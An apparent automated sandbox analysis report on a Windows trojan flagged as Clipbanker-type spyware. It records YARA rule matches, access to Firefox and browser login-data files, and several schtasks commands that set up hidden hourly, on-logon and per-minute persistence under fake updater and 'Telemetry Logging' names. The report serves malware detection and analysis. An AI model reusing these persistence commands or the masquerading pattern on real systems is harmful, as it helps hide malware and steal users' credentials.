Source: 0000001D.00000002.2600512204.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001D.00000002.2600512204.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@52/34@3/5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063C9130 CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 0_2_063C9130
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2276:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\adobeaXLeM4rqVSWS Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.4533245156.0000000000515000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.4533245156.0000000000515000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: J_WXka4lbCqfLogin Data.0.dr, prD5bQEFZ56iLogin Data For Account.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 23%
Source: file.exe Virustotal: Detection: 30%
Source: file.exe String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe"
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: ntmarta.dll Jump to behavior
